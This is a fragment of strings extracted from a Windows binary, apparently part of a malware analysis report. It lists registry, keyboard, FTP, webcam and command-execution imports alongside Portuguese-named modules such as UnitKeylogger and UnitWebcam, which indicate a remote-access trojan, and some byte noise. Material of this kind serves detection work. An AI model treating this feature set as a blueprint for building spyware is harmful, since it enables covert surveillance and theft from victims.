Adler</pre><pre>GetProcessHeap</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>oleaut32.dll</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegDeleteKeyA</pre><pre>RegCreateKeyA</pre><pre>WinExec</pre><pre>SetNamedPipeHandleState</pre><pre>CreatePipe</pre><pre>mpr.dll</pre><pre>gdi32.dll</pre><pre>keybd_event</pre><pre>MapVirtualKeyA</pre><pre>GetKeyboardState</pre><pre>GetKeyboardLayoutNameA</pre><pre>GetKeyState</pre><pre>GetAsyncKeyState</pre><pre>ExitWindowsEx</pre><pre>EnumWindows</pre><pre>wininet.dll</pre><pre>FtpGetFileSize</pre><pre>FtpSetCurrentDirectoryA</pre><pre>FtpOpenFileA</pre><pre>wsock32.dll</pre><pre>ole32.dll</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>AVICAP32.DLL</pre><pre>winmm.dll</pre><pre>powrprof.dll</pre><pre>msacm32.dll</pre><pre>ADVAPI32.DLL</pre><pre>7-727:7?7</pre><pre>4.4 5=5`5|5 6</pre><pre>> >$>(>,></pre><pre>>'>3><>]>}></pre><pre>040=0^0~0</pre><pre>2 2/2]2}2</pre><pre>:$:6:^:~:</pre><pre>; ;%;-;5;</pre><pre>KWindows</pre><pre>UnitExecutarComandos</pre><pre>uftp</pre><pre>UrlMon</pre><pre>.UnitBytesSize</pre><pre>UnitListarPortasAtivas</pre><pre>UnitWebcam</pre><pre>UnitKeylogger</pre></requestedExecutionLevel>